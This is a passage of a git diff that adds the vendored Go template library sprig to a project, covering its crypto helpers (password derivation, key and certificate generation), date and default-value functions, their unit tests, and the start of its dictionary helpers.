+		[]byte("CvcvCvcvnoCvcc"), []byte("CvcvCvcvCvccno"), []byte("CvccnoCvccCvcv"), []byte("CvccCvccnoCvcv"), []byte("CvccCvccCvcvno"),
+		[]byte("CvcvnoCvccCvcc"), []byte("CvcvCvccnoCvcc"), []byte("CvcvCvccCvccno"), []byte("CvccnoCvcvCvcc"), []byte("CvccCvcvnoCvcc"),
+		[]byte("CvccCvcvCvccno")},
+	"medium": {[]byte("CvcnoCvc"), []byte("CvcCvcno")},
+	"short":  {[]byte("Cvcn")},
+	"basic":  {[]byte("aaanaaan"), []byte("aannaaan"), []byte("aaannaaa")},
+	"pin":    {[]byte("nnnn")},
+}
+
+var template_characters = map[byte]string{
+	'V': "AEIOU",
+	'C': "BCDFGHJKLMNPQRSTVWXYZ",
+	'v': "aeiou",
+	'c': "bcdfghjklmnpqrstvwxyz",
+	'A': "AEIOUBCDFGHJKLMNPQRSTVWXYZ",
+	'a': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz",
+	'n': "0123456789",
+	'o': "@&%?,=[]_:-+*$#!'^~;()/.",
+	'x': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz0123456789!@#$%^&*()",
+}
+
+func derivePassword(counter uint32, password_type, password, user, site string) string {
+	var templates = password_type_templates[password_type]
+	if templates == nil {
+		return fmt.Sprintf("cannot find password template %s", password_type)
+	}
+
+	var buffer bytes.Buffer
+	buffer.WriteString(master_password_seed)
+	binary.Write(&buffer, binary.BigEndian, uint32(len(user)))
+	buffer.WriteString(user)
+
+	salt := buffer.Bytes()
+	key, err := scrypt.Key([]byte(password), salt, 32768, 8, 2, 64)
+	if err != nil {
+		return fmt.Sprintf("failed to derive password: %s", err)
+	}
+
+	buffer.Truncate(len(master_password_seed))
+	binary.Write(&buffer, binary.BigEndian, uint32(len(site)))
+	buffer.WriteString(site)
+	binary.Write(&buffer, binary.BigEndian, counter)
+
+	var hmacv = hmac.New(sha256.New, key)
+	hmacv.Write(buffer.Bytes())
+	var seed = hmacv.Sum(nil)
+	var temp = templates[int(seed[0])%len(templates)]
+
+	buffer.Truncate(0)
+	for i, element := range temp {
+		pass_chars := template_characters[element]
+		pass_char := pass_chars[int(seed[i+1])%len(pass_chars)]
+		buffer.WriteByte(pass_char)
+	}
+
+	return buffer.String()
+}
+
+func generatePrivateKey(typ string) string {
+	var priv interface{}
+	var err error
+	switch typ {
+	case "", "rsa":
+		// good enough for government work
+		priv, err = rsa.GenerateKey(rand.Reader, 4096)
+	case "dsa":
+		key := new(dsa.PrivateKey)
+		// again, good enough for government work
+		if err = dsa.GenerateParameters(&key.Parameters, rand.Reader, dsa.L2048N256); err != nil {
+			return fmt.Sprintf("failed to generate dsa params: %s", err)
+		}
+		err = dsa.GenerateKey(key, rand.Reader)
+		priv = key
+	case "ecdsa":
+		// again, good enough for government work
+		priv, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
+	default:
+		return "Unknown type " + typ
+	}
+	if err != nil {
+		return fmt.Sprintf("failed to generate private key: %s", err)
+	}
+
+	return string(pem.EncodeToMemory(pemBlockForKey(priv)))
+}
+
+type DSAKeyFormat struct {
+	Version       int
+	P, Q, G, Y, X *big.Int
+}
+
+func pemBlockForKey(priv interface{}) *pem.Block {
+	switch k := priv.(type) {
+	case *rsa.PrivateKey:
+		return &pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)}
+	case *dsa.PrivateKey:
+		val := DSAKeyFormat{
+			P: k.P, Q: k.Q, G: k.G,
+			Y: k.Y, X: k.X,
+		}
+		bytes, _ := asn1.Marshal(val)
+		return &pem.Block{Type: "DSA PRIVATE KEY", Bytes: bytes}
+	case *ecdsa.PrivateKey:
+		b, _ := x509.MarshalECPrivateKey(k)
+		return &pem.Block{Type: "EC PRIVATE KEY", Bytes: b}
+	default:
+		return nil
+	}
+}
+
+type certificate struct {
+	Cert string
+	Key  string
+}
+
+func buildCustomCertificate(b64cert string, b64key string) (certificate, error) {
+	crt := certificate{}
+
+	cert, err := base64.StdEncoding.DecodeString(b64cert)
+	if err != nil {
+		return crt, errors.New("unable to decode base64 certificate")
+	}
+
+	key, err := base64.StdEncoding.DecodeString(b64key)
+	if err != nil {
+		return crt, errors.New("unable to decode base64 private key")
+	}
+
+	decodedCert, _ := pem.Decode(cert)
+	if decodedCert == nil {
+		return crt, errors.New("unable to decode certificate")
+	}
+	_, err = x509.ParseCertificate(decodedCert.Bytes)
+	if err != nil {
+		return crt, fmt.Errorf(
+			"error parsing certificate: decodedCert.Bytes: %s",
+			err,
+		)
+	}
+
+	decodedKey, _ := pem.Decode(key)
+	if decodedKey == nil {
+		return crt, errors.New("unable to decode key")
+	}
+	_, err = x509.ParsePKCS1PrivateKey(decodedKey.Bytes)
+	if err != nil {
+		return crt, fmt.Errorf(
+			"error parsing prive key: decodedKey.Bytes: %s",
+			err,
+		)
+	}
+
+	crt.Cert = string(cert)
+	crt.Key = string(key)
+
+	return crt, nil
+}
+
+func generateCertificateAuthority(
+	cn string,
+	daysValid int,
+) (certificate, error) {
+	ca := certificate{}
+
+	template, err := getBaseCertTemplate(cn, nil, nil, daysValid)
+	if err != nil {
+		return ca, err
+	}
+	// Override KeyUsage and IsCA
+	template.KeyUsage = x509.KeyUsageKeyEncipherment |
+		x509.KeyUsageDigitalSignature |
+		x509.KeyUsageCertSign
+	template.IsCA = true
+
+	priv, err := rsa.GenerateKey(rand.Reader, 2048)
+	if err != nil {
+		return ca, fmt.Errorf("error generating rsa key: %s", err)
+	}
+
+	ca.Cert, ca.Key, err = getCertAndKey(template, priv, template, priv)
+	if err != nil {
+		return ca, err
+	}
+
+	return ca, nil
+}
+
+func generateSelfSignedCertificate(
+	cn string,
+	ips []interface{},
+	alternateDNS []interface{},
+	daysValid int,
+) (certificate, error) {
+	cert := certificate{}
+
+	template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+	if err != nil {
+		return cert, err
+	}
+
+	priv, err := rsa.GenerateKey(rand.Reader, 2048)
+	if err != nil {
+		return cert, fmt.Errorf("error generating rsa key: %s", err)
+	}
+
+	cert.Cert, cert.Key, err = getCertAndKey(template, priv, template, priv)
+	if err != nil {
+		return cert, err
+	}
+
+	return cert, nil
+}
+
+func generateSignedCertificate(
+	cn string,
+	ips []interface{},
+	alternateDNS []interface{},
+	daysValid int,
+	ca certificate,
+) (certificate, error) {
+	cert := certificate{}
+
+	decodedSignerCert, _ := pem.Decode([]byte(ca.Cert))
+	if decodedSignerCert == nil {
+		return cert, errors.New("unable to decode certificate")
+	}
+	signerCert, err := x509.ParseCertificate(decodedSignerCert.Bytes)
+	if err != nil {
+		return cert, fmt.Errorf(
+			"error parsing certificate: decodedSignerCert.Bytes: %s",
+			err,
+		)
+	}
+	decodedSignerKey, _ := pem.Decode([]byte(ca.Key))
+	if decodedSignerKey == nil {
+		return cert, errors.New("unable to decode key")
+	}
+	signerKey, err := x509.ParsePKCS1PrivateKey(decodedSignerKey.Bytes)
+	if err != nil {
+		return cert, fmt.Errorf(
+			"error parsing prive key: decodedSignerKey.Bytes: %s",
+			err,
+		)
+	}
+
+	template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+	if err != nil {
+		return cert, err
+	}
+
+	priv, err := rsa.GenerateKey(rand.Reader, 2048)
+	if err != nil {
+		return cert, fmt.Errorf("error generating rsa key: %s", err)
+	}
+
+	cert.Cert, cert.Key, err = getCertAndKey(
+		template,
+		priv,
+		signerCert,
+		signerKey,
+	)
+	if err != nil {
+		return cert, err
+	}
+
+	return cert, nil
+}
+
+func getCertAndKey(
+	template *x509.Certificate,
+	signeeKey *rsa.PrivateKey,
+	parent *x509.Certificate,
+	signingKey *rsa.PrivateKey,
+) (string, string, error) {
+	derBytes, err := x509.CreateCertificate(
+		rand.Reader,
+		template,
+		parent,
+		&signeeKey.PublicKey,
+		signingKey,
+	)
+	if err != nil {
+		return "", "", fmt.Errorf("error creating certificate: %s", err)
+	}
+
+	certBuffer := bytes.Buffer{}
+	if err := pem.Encode(
+		&certBuffer,
+		&pem.Block{Type: "CERTIFICATE", Bytes: derBytes},
+	); err != nil {
+		return "", "", fmt.Errorf("error pem-encoding certificate: %s", err)
+	}
+
+	keyBuffer := bytes.Buffer{}
+	if err := pem.Encode(
+		&keyBuffer,
+		&pem.Block{
+			Type:  "RSA PRIVATE KEY",
+			Bytes: x509.MarshalPKCS1PrivateKey(signeeKey),
+		},
+	); err != nil {
+		return "", "", fmt.Errorf("error pem-encoding key: %s", err)
+	}
+
+	return string(certBuffer.Bytes()), string(keyBuffer.Bytes()), nil
+}
+
+func getBaseCertTemplate(
+	cn string,
+	ips []interface{},
+	alternateDNS []interface{},
+	daysValid int,
+) (*x509.Certificate, error) {
+	ipAddresses, err := getNetIPs(ips)
+	if err != nil {
+		return nil, err
+	}
+	dnsNames, err := getAlternateDNSStrs(alternateDNS)
+	if err != nil {
+		return nil, err
+	}
+	return &x509.Certificate{
+		SerialNumber: big.NewInt(1),
+		Subject: pkix.Name{
+			CommonName: cn,
+		},
+		IPAddresses: ipAddresses,
+		DNSNames:    dnsNames,
+		NotBefore:   time.Now(),
+		NotAfter:    time.Now().Add(time.Hour * 24 * time.Duration(daysValid)),
+		KeyUsage:    x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
+		ExtKeyUsage: []x509.ExtKeyUsage{
+			x509.ExtKeyUsageServerAuth,
+			x509.ExtKeyUsageClientAuth,
+		},
+		BasicConstraintsValid: true,
+	}, nil
+}
+
+func getNetIPs(ips []interface{}) ([]net.IP, error) {
+	if ips == nil {
+		return []net.IP{}, nil
+	}
+	var ipStr string
+	var ok bool
+	var netIP net.IP
+	netIPs := make([]net.IP, len(ips))
+	for i, ip := range ips {
+		ipStr, ok = ip.(string)
+		if !ok {
+			return nil, fmt.Errorf("error parsing ip: %v is not a string", ip)
+		}
+		netIP = net.ParseIP(ipStr)
+		if netIP == nil {
+			return nil, fmt.Errorf("error parsing ip: %s", ipStr)
+		}
+		netIPs[i] = netIP
+	}
+	return netIPs, nil
+}
+
+func getAlternateDNSStrs(alternateDNS []interface{}) ([]string, error) {
+	if alternateDNS == nil {
+		return []string{}, nil
+	}
+	var dnsStr string
+	var ok bool
+	alternateDNSStrs := make([]string, len(alternateDNS))
+	for i, dns := range alternateDNS {
+		dnsStr, ok = dns.(string)
+		if !ok {
+			return nil, fmt.Errorf(
+				"error processing alternate dns name: %v is not a string",
+				dns,
+			)
+		}
+		alternateDNSStrs[i] = dnsStr
+	}
+	return alternateDNSStrs, nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/crypto_test.go b/vendor/github.com/Masterminds/sprig/crypto_test.go
new file mode 100644
index 0000000000..77b3e3fb2c
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto_test.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+	"crypto/x509"
+	"encoding/base64"
+	"encoding/pem"
+	"fmt"
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+const (
+	beginCertificate = "-----BEGIN CERTIFICATE-----"
+	endCertificate   = "-----END CERTIFICATE-----"
+)
+
+func TestSha256Sum(t *testing.T) {
+	tpl := `{{"abc" | sha256sum}}`
+	if err := runt(tpl, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); err != nil {
+		t.Error(err)
+	}
+}
+func TestSha1Sum(t *testing.T) {
+	tpl := `{{"abc" | sha1sum}}`
+	if err := runt(tpl, "a9993e364706816aba3e25717850c26c9cd0d89d"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestDerivePassword(t *testing.T) {
+	expectations := map[string]string{
+		`{{derivePassword 1 "long" "password" "user" "example.com"}}`:    "ZedaFaxcZaso9*",
+		`{{derivePassword 2 "long" "password" "user" "example.com"}}`:    "Fovi2@JifpTupx",
+		`{{derivePassword 1 "maximum" "password" "user" "example.com"}}`: "pf4zS1LjCg&LjhsZ7T2~",
+		`{{derivePassword 1 "medium" "password" "user" "example.com"}}`:  "ZedJuz8$",
+		`{{derivePassword 1 "basic" "password" "user" "example.com"}}`:   "pIS54PLs",
+		`{{derivePassword 1 "short" "password" "user" "example.com"}}`:   "Zed5",
+		`{{derivePassword 1 "pin" "password" "user" "example.com"}}`:     "6685",
+	}
+
+	for tpl, result := range expectations {
+		out, err := runRaw(tpl, nil)
+		if err != nil {
+			t.Error(err)
+		}
+		if 0 != strings.Compare(out, result) {
+			t.Error("Generated password does not match for", tpl)
+		}
+	}
+}
+
+// NOTE(bacongobbler): this test is really _slow_ because of how long it takes to compute
+// and generate a new crypto key.
+func TestGenPrivateKey(t *testing.T) {
+	// test that calling by default generates an RSA private key
+	tpl := `{{genPrivateKey ""}}`
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if !strings.Contains(out, "RSA PRIVATE KEY") {
+		t.Error("Expected RSA PRIVATE KEY")
+	}
+	// test all acceptable arguments
+	tpl = `{{genPrivateKey "rsa"}}`
+	out, err = runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if !strings.Contains(out, "RSA PRIVATE KEY") {
+		t.Error("Expected RSA PRIVATE KEY")
+	}
+	tpl = `{{genPrivateKey "dsa"}}`
+	out, err = runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if !strings.Contains(out, "DSA PRIVATE KEY") {
+		t.Error("Expected DSA PRIVATE KEY")
+	}
+	tpl = `{{genPrivateKey "ecdsa"}}`
+	out, err = runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if !strings.Contains(out, "EC PRIVATE KEY") {
+		t.Error("Expected EC PRIVATE KEY")
+	}
+	// test bad
+	tpl = `{{genPrivateKey "bad"}}`
+	out, err = runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if out != "Unknown type bad" {
+		t.Error("Expected type 'bad' to be an unknown crypto algorithm")
+	}
+	// ensure that we can base64 encode the string
+	tpl = `{{genPrivateKey "rsa" | b64enc}}`
+	out, err = runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+}
+
+func TestUUIDGeneration(t *testing.T) {
+	tpl := `{{uuidv4}}`
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+
+	if len(out) != 36 {
+		t.Error("Expected UUID of length 36")
+	}
+
+	out2, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+
+	if out == out2 {
+		t.Error("Expected subsequent UUID generations to be different")
+	}
+}
+
+func TestBuildCustomCert(t *testing.T) {
+	ca, _ := generateCertificateAuthority("example.com", 365)
+	tpl := fmt.Sprintf(
+		`{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+		base64.StdEncoding.EncodeToString([]byte(ca.Cert)),
+		base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+	)
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+
+	tpl2 := fmt.Sprintf(
+		`{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+		base64.StdEncoding.EncodeToString([]byte("fail")),
+		base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+	)
+	out2, _ := runRaw(tpl2, nil)
+
+	assert.Equal(t, out, ca.Cert)
+	assert.NotEqual(t, out2, ca.Cert)
+}
+
+func TestGenCA(t *testing.T) {
+	const cn = "foo-ca"
+
+	tpl := fmt.Sprintf(
+		`{{- $ca := genCA "%s" 365 }}
+{{ $ca.Cert }}
+`,
+		cn,
+	)
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	assert.Contains(t, out, beginCertificate)
+	assert.Contains(t, out, endCertificate)
+
+	decodedCert, _ := pem.Decode([]byte(out))
+	assert.Nil(t, err)
+	cert, err := x509.ParseCertificate(decodedCert.Bytes)
+	assert.Nil(t, err)
+
+	assert.Equal(t, cn, cert.Subject.CommonName)
+	assert.True(t, cert.IsCA)
+}
+
+func TestGenSelfSignedCert(t *testing.T) {
+	const (
+		cn   = "foo.com"
+		ip1  = "10.0.0.1"
+		ip2  = "10.0.0.2"
+		dns1 = "bar.com"
+		dns2 = "bat.com"
+	)
+
+	tpl := fmt.Sprintf(
+		`{{- $cert := genSelfSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 }}
+{{ $cert.Cert }}`,
+		cn,
+		ip1,
+		ip2,
+		dns1,
+		dns2,
+	)
+
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	assert.Contains(t, out, beginCertificate)
+	assert.Contains(t, out, endCertificate)
+
+	decodedCert, _ := pem.Decode([]byte(out))
+	assert.Nil(t, err)
+	cert, err := x509.ParseCertificate(decodedCert.Bytes)
+	assert.Nil(t, err)
+
+	assert.Equal(t, cn, cert.Subject.CommonName)
+	assert.Equal(t, 2, len(cert.IPAddresses))
+	assert.Equal(t, ip1, cert.IPAddresses[0].String())
+	assert.Equal(t, ip2, cert.IPAddresses[1].String())
+	assert.Contains(t, cert.DNSNames, dns1)
+	assert.Contains(t, cert.DNSNames, dns2)
+	assert.False(t, cert.IsCA)
+}
+
+func TestGenSignedCert(t *testing.T) {
+	const (
+		cn   = "foo.com"
+		ip1  = "10.0.0.1"
+		ip2  = "10.0.0.2"
+		dns1 = "bar.com"
+		dns2 = "bat.com"
+	)
+
+	tpl := fmt.Sprintf(
+		`{{- $ca := genCA "foo" 365 }}
+{{- $cert := genSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 $ca }}
+{{ $cert.Cert }}
+`,
+		cn,
+		ip1,
+		ip2,
+		dns1,
+		dns2,
+	)
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+
+	assert.Contains(t, out, beginCertificate)
+	assert.Contains(t, out, endCertificate)
+
+	decodedCert, _ := pem.Decode([]byte(out))
+	assert.Nil(t, err)
+	cert, err := x509.ParseCertificate(decodedCert.Bytes)
+	assert.Nil(t, err)
+
+	assert.Equal(t, cn, cert.Subject.CommonName)
+	assert.Equal(t, 2, len(cert.IPAddresses))
+	assert.Equal(t, ip1, cert.IPAddresses[0].String())
+	assert.Equal(t, ip2, cert.IPAddresses[1].String())
+	assert.Contains(t, cert.DNSNames, dns1)
+	assert.Contains(t, cert.DNSNames, dns2)
+	assert.False(t, cert.IsCA)
+}
diff --git a/vendor/github.com/Masterminds/sprig/date.go b/vendor/github.com/Masterminds/sprig/date.go
new file mode 100644
index 0000000000..1c2c3653c8
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date.go
@@ -0,0 +1,76 @@
+package sprig
+
+import (
+	"time"
+)
+
+// Given a format and a date, format the date string.
+//
+// Date can be a `time.Time` or an `int, int32, int64`.
+// In the later case, it is treated as seconds since UNIX
+// epoch.
+func date(fmt string, date interface{}) string {
+	return dateInZone(fmt, date, "Local")
+}
+
+func htmlDate(date interface{}) string {
+	return dateInZone("2006-01-02", date, "Local")
+}
+
+func htmlDateInZone(date interface{}, zone string) string {
+	return dateInZone("2006-01-02", date, zone)
+}
+
+func dateInZone(fmt string, date interface{}, zone string) string {
+	var t time.Time
+	switch date := date.(type) {
+	default:
+		t = time.Now()
+	case time.Time:
+		t = date
+	case int64:
+		t = time.Unix(date, 0)
+	case int:
+		t = time.Unix(int64(date), 0)
+	case int32:
+		t = time.Unix(int64(date), 0)
+	}
+
+	loc, err := time.LoadLocation(zone)
+	if err != nil {
+		loc, _ = time.LoadLocation("UTC")
+	}
+
+	return t.In(loc).Format(fmt)
+}
+
+func dateModify(fmt string, date time.Time) time.Time {
+	d, err := time.ParseDuration(fmt)
+	if err != nil {
+		return date
+	}
+	return date.Add(d)
+}
+
+func dateAgo(date interface{}) string {
+	var t time.Time
+
+	switch date := date.(type) {
+	default:
+		t = time.Now()
+	case time.Time:
+		t = date
+	case int64:
+		t = time.Unix(date, 0)
+	case int:
+		t = time.Unix(int64(date), 0)
+	}
+	// Drop resolution to seconds
+	duration := time.Since(t).Round(time.Second)
+	return duration.String()
+}
+
+func toDate(fmt, str string) time.Time {
+	t, _ := time.ParseInLocation(fmt, str, time.Local)
+	return t
+}
diff --git a/vendor/github.com/Masterminds/sprig/date_test.go b/vendor/github.com/Masterminds/sprig/date_test.go
new file mode 100644
index 0000000000..b98200dd03
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date_test.go
@@ -0,0 +1,36 @@
+package sprig
+
+import (
+	"testing"
+	"time"
+)
+
+func TestHtmlDate(t *testing.T) {
+	t.Skip()
+	tpl := `{{ htmlDate 0}}`
+	if err := runt(tpl, "1970-01-01"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestAgo(t *testing.T) {
+	tpl := "{{ ago .Time }}"
+	if err := runtv(tpl, "2m5s", map[string]interface{}{"Time": time.Now().Add(-125 * time.Second)}); err != nil {
+		t.Error(err)
+	}
+
+	if err := runtv(tpl, "2h34m17s", map[string]interface{}{"Time": time.Now().Add(-(2*3600 + 34*60 + 17) * time.Second)}); err != nil {
+		t.Error(err)
+	}
+
+	if err := runtv(tpl, "-5s", map[string]interface{}{"Time": time.Now().Add(5 * time.Second)}); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestToDate(t *testing.T) {
+	tpl := `{{toDate "2006-01-02" "2017-12-31" | date "02/01/2006"}}`
+	if err := runt(tpl, "31/12/2017"); err != nil {
+		t.Error(err)
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults.go b/vendor/github.com/Masterminds/sprig/defaults.go
new file mode 100644
index 0000000000..f0161317dc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults.go
@@ -0,0 +1,84 @@
+package sprig
+
+import (
+	"encoding/json"
+	"reflect"
+)
+
+// dfault checks whether `given` is set, and returns default if not set.
+//
+// This returns `d` if `given` appears not to be set, and `given` otherwise.
+//
+// For numeric types 0 is unset.
+// For strings, maps, arrays, and slices, len() = 0 is considered unset.
+// For bool, false is unset.
+// Structs are never considered unset.
+//
+// For everything else, including pointers, a nil value is unset.
+func dfault(d interface{}, given ...interface{}) interface{} {
+
+	if empty(given) || empty(given[0]) {
+		return d
+	}
+	return given[0]
+}
+
+// empty returns true if the given value has the zero value for its type.
+func empty(given interface{}) bool {
+	g := reflect.ValueOf(given)
+	if !g.IsValid() {
+		return true
+	}
+
+	// Basically adapted from text/template.isTrue
+	switch g.Kind() {
+	default:
+		return g.IsNil()
+	case reflect.Array, reflect.Slice, reflect.Map, reflect.String:
+		return g.Len() == 0
+	case reflect.Bool:
+		return g.Bool() == false
+	case reflect.Complex64, reflect.Complex128:
+		return g.Complex() == 0
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		return g.Int() == 0
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+		return g.Uint() == 0
+	case reflect.Float32, reflect.Float64:
+		return g.Float() == 0
+	case reflect.Struct:
+		return false
+	}
+	return true
+}
+
+// coalesce returns the first non-empty value.
+func coalesce(v ...interface{}) interface{} {
+	for _, val := range v {
+		if !empty(val) {
+			return val
+		}
+	}
+	return nil
+}
+
+// toJson encodes an item into a JSON string
+func toJson(v interface{}) string {
+	output, _ := json.Marshal(v)
+	return string(output)
+}
+
+// toPrettyJson encodes an item into a pretty (indented) JSON string
+func toPrettyJson(v interface{}) string {
+	output, _ := json.MarshalIndent(v, "", "  ")
+	return string(output)
+}
+
+// ternary returns the first value if the last value is true, otherwise returns the second value.
+func ternary(vt interface{}, vf interface{}, v bool) interface{} {
+	if v {
+		return vt
+	}
+
+	return vf
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults_test.go b/vendor/github.com/Masterminds/sprig/defaults_test.go
new file mode 100644
index 0000000000..226d914cbf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults_test.go
@@ -0,0 +1,129 @@
+package sprig
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestDefault(t *testing.T) {
+	tpl := `{{"" | default "foo"}}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{default "foo" 234}}`
+	if err := runt(tpl, "234"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{default "foo" 2.34}}`
+	if err := runt(tpl, "2.34"); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{ .Nothing | default "123" }}`
+	if err := runt(tpl, "123"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{ default "123" }}`
+	if err := runt(tpl, "123"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestEmpty(t *testing.T) {
+	tpl := `{{if empty 1}}1{{else}}0{{end}}`
+	if err := runt(tpl, "0"); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{if empty 0}}1{{else}}0{{end}}`
+	if err := runt(tpl, "1"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{if empty ""}}1{{else}}0{{end}}`
+	if err := runt(tpl, "1"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{if empty 0.0}}1{{else}}0{{end}}`
+	if err := runt(tpl, "1"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{if empty false}}1{{else}}0{{end}}`
+	if err := runt(tpl, "1"); err != nil {
+		t.Error(err)
+	}
+
+	dict := map[string]interface{}{"top": map[string]interface{}{}}
+	tpl = `{{if empty .top.NoSuchThing}}1{{else}}0{{end}}`
+	if err := runtv(tpl, "1", dict); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{if empty .bottom.NoSuchThing}}1{{else}}0{{end}}`
+	if err := runtv(tpl, "1", dict); err != nil {
+		t.Error(err)
+	}
+}
+func TestCoalesce(t *testing.T) {
+	tests := map[string]string{
+		`{{ coalesce 1 }}`:                            "1",
+		`{{ coalesce "" 0 nil 2 }}`:                   "2",
+		`{{ $two := 2 }}{{ coalesce "" 0 nil $two }}`: "2",
+		`{{ $two := 2 }}{{ coalesce "" $two 0 0 0 }}`: "2",
+		`{{ $two := 2 }}{{ coalesce "" $two 3 4 5 }}`: "2",
+		`{{ coalesce }}`:                              "<no value>",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+
+	dict := map[string]interface{}{"top": map[string]interface{}{}}
+	tpl := `{{ coalesce .top.NoSuchThing .bottom .bottom.dollar "airplane"}}`
+	if err := runtv(tpl, "airplane", dict); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestToJson(t *testing.T) {
+	dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+
+	tpl := `{{.Top | toJson}}`
+	expected := `{"bool":true,"number":42,"string":"test"}`
+	if err := runtv(tpl, expected, dict); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestToPrettyJson(t *testing.T) {
+	dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+	tpl := `{{.Top | toPrettyJson}}`
+	expected := `{
+  "bool": true,
+  "number": 42,
+  "string": "test"
+}`
+	if err := runtv(tpl, expected, dict); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestTernary(t *testing.T) {
+	tpl := `{{true | ternary "foo" "bar"}}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{ternary "foo" "bar" true}}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{false | ternary "foo" "bar"}}`
+	if err := runt(tpl, "bar"); err != nil {
+		t.Error(err)
+	}
+
+	tpl = `{{ternary "foo" "bar" false}}`
+	if err := runt(tpl, "bar"); err != nil {
+		t.Error(err)
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict.go b/vendor/github.com/Masterminds/sprig/dict.go
new file mode 100644
index 0000000000..59076c0182
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict.go
@@ -0,0 +1,88 @@
+package sprig
+
+import "github.com/imdario/mergo"
+
+func set(d map[string]interface{}, key string, value interface{}) map[string]interface{} {
+	d[key] = value
+	return d
+}
+
+func unset(d map[string]interface{}, key string) map[string]interface{} {
+	delete(d, key)
+	return d
+}
+
+func hasKey(d map[string]interface{}, key string) bool {
+	_, ok := d[key]
+	return ok
+}
+
+func pluck(key string, d ...map[string]interface{}) []interface{} {
+	res := []interface{}{}
+	for _, dict := range d {
+		if val, ok := dict[key]; ok {
+			res = append(res, val)
+		}
+	}
+	return res
+}
+
+func keys(dicts ...map[string]interface{}) []string {
+	k := []string{}
+	for _, dict := range dicts {
+		for key := range dict {
+			k = append(k, key)
+		}
+	}
+	return k
+}
+
+func pick(dict map[string]interface{}, keys ...string) map[string]interface{} {
+	res := map[string]interface{}{}
+	for _, k := range keys {
+		if v, ok := dict[k]; ok {
+			res[k] = v
+		}
+	}
+	return res
+}
+
+func omit(dict map[string]interface{}, keys ...string) map[string]interface{} {
+	res := map[string]interface{}{}
+
+	omit := make(map[string]bool, len(keys))
+	for _, k := range keys {
+		omit[k] = true
+	}
+
+	for k, v := range dict {
+		if _, ok := omit[k]; !ok {
+			res[k] = v
+		}
+	}
+	return res
+}
+
+func dict(v ...interface{}) map[string]interface{} {
+	dict := map[string]interface{}{}
+	lenv := len(v)
+	for i := 0; i < lenv; i += 2 {
+		key := strval(v[i])
+		if i+1 >= lenv {
+			dict[key] = ""
+			continue
+		}
+		dict[key] = v[i+1]
+	}
+	return dict
+}
+
+func merge(dst map[string]interface{}, srcs ...map[string]interface{}) interface{} {
+	for _, src := range srcs {
+		if err := mergo.Merge(&dst, src); err != nil {
+			// Swallow errors inside of a template.
